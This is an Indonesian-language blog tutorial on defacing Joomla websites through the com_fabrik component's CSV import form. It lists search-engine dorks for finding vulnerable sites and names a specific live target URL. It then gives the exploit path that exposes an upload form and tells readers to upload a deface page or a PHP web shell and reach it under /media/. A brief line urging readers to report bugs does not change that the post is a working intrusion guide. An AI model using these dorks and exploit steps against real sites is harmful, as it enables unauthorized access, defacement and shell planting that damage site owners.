Tutorial Deface : dengan Com fabrik ( ada vidionya )

Hello World; Pagi Fans, Please Say Hello Haters :*

yoehh Gengs, lanjut lagi Walking Blog :D , Nah kali ini Gue cuma mau brbagi tentang salah satu Exploit Joomla(salah satu Bug/Celah pada CMS Joomla).

Yupz, Tutorial Deface CMS Joomla dengan Exploit Com_Fabrik.

Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Fabrik di CMS Joomla.

Iseng2 buka folder lama, eh nemu file txt yg berisi webtarget vuln, pas di coba ada 1 web nih yg masih vuln com_fabrik, haha yowes gua bikin bahan utk tutorial artikel diBlog ini aja. Berharap ada agan yg bisa ngembangin Dork Freshnya, dan Teknik ini bisa mengemparkan dunia persilatan di Jones-H lagi akwkwak >.<" . *curhatan mengenang masalalu :'D

Let's Play with me Baby ;*

Dork:

inurl:"index.php?option=com_fabrik" intext:"import CSV file"  <- New Dork Fresh

inurl:index.php?option=com_fabrik

inurl:index.php/component/fabrik/ site:

inurl:index.php?option=com_fabrik&view= site:

inurl:importcsv.php site:

inurl:viewTable?cid= site:com

(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

life target : http://www.anticoborgonarcao.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1,

Exploit: 
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
or
/index.php?option=com_fabrik&amp;c=import&amp;view=import&amp;filetype=csv&amp;tableid=1echercher 

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
contoh: target.coli/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

3. maka akan  Muncul Form Upload *seperti di gambar:

Upload script deface agan, Lalu Klik Import CSV
kalau beruntung anda juga bisa upload shell 

kala berhasil akan ada tulisan error kayak gini atau error lainnya

tapi kalau webnya gak vunl alias gagal upload kayak gini

4. Shell/File Akses: /media/scriptdeface.html
contoh: target.coli/media/namashell.php

Gimana Mau PhP, HTML aja masih belajar :'D

Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) )) 

Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai para WebMaster ;*

untuk tutor vidio bisa nonton dibawah ini

"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"